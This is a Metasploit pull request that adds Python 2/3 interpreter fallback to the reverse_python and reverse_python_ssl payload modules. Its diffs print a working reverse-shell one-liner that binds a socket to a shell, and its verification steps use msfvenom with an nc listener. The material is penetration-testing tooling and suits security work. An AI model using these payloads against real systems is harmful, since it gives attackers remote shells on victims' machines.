### PR TITLE
added multi python support for payloads that lacked it

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -35,7 +35,7 @@ module MetasploitModule
     )
     register_advanced_options(
       [
-        OptString.new('PythonPath', [true, 'The path to the Python executable', 'python'])
+        OptString.new('PythonPath', [true, 'The path to the Python executable', '$(which python || which python3 || which python2)'])
       ]
     )
   end
@@ -59,6 +59,6 @@ module MetasploitModule
   def command_string
     raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\")"
     cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
-    "#{datastore['PythonPath']} -c \"#{py_create_exec_stub(cmd)}\""
+    "echo #{Shellwords.escape(cmd)} | #{datastore['PythonPath']} -"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -35,7 +35,7 @@ module MetasploitModule
     )
     register_advanced_options(
       [
-        OptString.new('PythonPath', [true, 'The path to the Python executable', ''])
+        OptString.new('PythonPath', [false, 'The path to the Python executable'])
       ]
     )
   end
@@ -59,7 +59,7 @@ module MetasploitModule
   def command_string
     raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\")"
     cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
-    if datastore['PythonPath'].empty?
+    if datastore['PythonPath'].nil?
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
     else
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"

--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -35,7 +35,7 @@ module MetasploitModule
     )
     register_advanced_options(
       [
-        OptString.new('PythonPath', [true, 'The path to the Python executable', '$(which python || which python3 || which python2)'])
+        OptString.new('PythonPath', [true, 'The path to the Python executable', ''])
       ]
     )
   end
@@ -59,6 +59,10 @@ module MetasploitModule
   def command_string
     raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\")"
     cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
-    "echo #{Shellwords.escape(cmd)} | #{datastore['PythonPath']} -"
+    if datastore['PythonPath'].empty?
+      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
+    else
+      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"
+    end
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -59,10 +59,7 @@ module MetasploitModule
   def command_string
     raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\")"
     cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
-    if datastore['PythonPath'].nil?
-      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
-    else
-      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"
-    end
+    python_path = datastore['PythonPath'].blank? ? '$(which python || which python3 || which python2)' : datastore['PythonPath']
+    "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{python_path}"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -32,7 +32,7 @@ module MetasploitModule
     )
     register_advanced_options(
       [
-        OptString.new('PythonPath', [true, 'The path to the Python executable', 'python'])
+        OptString.new('PythonPath', [true, 'The path to the Python executable', '$(which python || which python3 || which python2)'])
       ]
     )
   end
@@ -64,6 +64,6 @@ module MetasploitModule
     cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
-    "#{datastore['PythonPath']} -c \"#{py_create_exec_stub(cmd)}\""
+    "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']} -"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -32,7 +32,7 @@ module MetasploitModule
     )
     register_advanced_options(
       [
-        OptString.new('PythonPath', [true, 'The path to the Python executable', '$(which python || which python3 || which python2)'])
+        OptString.new('PythonPath', [true, 'The path to the Python executable', ''])
       ]
     )
   end
@@ -64,6 +64,10 @@ module MetasploitModule
     cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
-    "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']} -"
+    if datastore['PythonPath'].empty?
+      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
+    else
+      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"
+    end
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -32,7 +32,7 @@ module MetasploitModule
     )
     register_advanced_options(
       [
-        OptString.new('PythonPath', [true, 'The path to the Python executable', ''])
+        OptString.new('PythonPath', [false, 'The path to the Python executable'])
       ]
     )
   end
@@ -64,7 +64,7 @@ module MetasploitModule
     cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
-    if datastore['PythonPath'].empty?
+    if datastore['PythonPath'].nil?
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
     else
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -64,10 +64,7 @@ module MetasploitModule
     cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
-    if datastore['PythonPath'].nil?
-      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
-    else
-      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"
-    end
+    python_path = datastore['PythonPath'].blank? ? '$(which python || which python3 || which python2)' : datastore['PythonPath']
+    "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{python_path}"
   end
 end


### PR DESCRIPTION
Fixes #19811 
A dded multi python binaries support for payloads that lacked it:
- cmd/unix/reverse_python_ssl
- cmd/unix/reverse_python
Since the payloads allow for the user to set a python path, set the default to `$(which python || which python3 || which python2)`. 
Also changed the string returned by command_string to make it consistent with the one in python/exec.

Note: it seems like reverse_python_ssl does not work with python versions newer than 3.12 because of removed method `ssl.wrap_socket()` idk if this is expected.

## Verification



- [ ] Run `msfvenom -p cmd/unix/reverse_python` and `msfvenom -p cmd/unix/reverse_python_ssl` on a test machine
- [ ] Run `nc -lvnp 4444` on the host
- [ ] Make sure the shell works
- [ ] Try it with machines running different python version



